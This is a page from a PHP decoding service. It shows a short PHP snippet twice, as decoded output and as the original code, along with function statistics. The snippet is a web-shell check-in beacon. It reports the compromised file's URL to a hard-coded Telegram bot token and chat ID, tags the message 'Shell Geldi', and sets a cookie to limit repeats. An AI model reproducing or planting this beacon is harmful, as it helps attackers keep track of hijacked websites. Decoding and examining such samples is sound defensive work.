Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if (!isset($_COOKIE['deneme'])) { // alan dosyann tam yolunu aln $file_pa..

Decoded Output download

<?php 
if (!isset($_COOKIE['deneme'])) { 
    // alan dosyann tam yolunu aln 
    $file_path = realpath(__FILE__);  
     
    // Dosya yolunu URL'ye dntrn 
    $base_url = 'http://' . $_SERVER['HTTP_HOST']; 
    $file_url = str_replace($_SERVER['DOCUMENT_ROOT'], $base_url, $file_path); 
     
    // Telegram API istei 
    file_get_contents("https://api.telegram.org/bot8116922956:AAHbWgOIYyfNCXUtDyQKMAYvbYAxQb6wQ5c/sendMessage?chat_id=7618974051&text=Shell Geldi= " . urlencode($file_url)); 
 
    // erez ayarla 
    setcookie("deneme", "a", time() + 3600, "/"); 
} 
?> 

Did this file decode correctly?

Original Code

<?php
if (!isset($_COOKIE['deneme'])) {
    // alan dosyann tam yolunu aln
    $file_path = realpath(__FILE__); 
    
    // Dosya yolunu URL'ye dntrn
    $base_url = 'http://' . $_SERVER['HTTP_HOST'];
    $file_url = str_replace($_SERVER['DOCUMENT_ROOT'], $base_url, $file_path);
    
    // Telegram API istei
    file_get_contents("https://api.telegram.org/bot8116922956:AAHbWgOIYyfNCXUtDyQKMAYvbYAxQb6wQ5c/sendMessage?chat_id=7618974051&text=Shell Geldi= " . urlencode($file_url));

    // erez ayarla
    setcookie("deneme", "a", time() + 3600, "/");
}
?>

Function Calls

realpath 1

Variables

None

Stats

MD5 fef4e5389ccc65b53b7e81003218e709
Eval Count 0
Decode Time 102 ms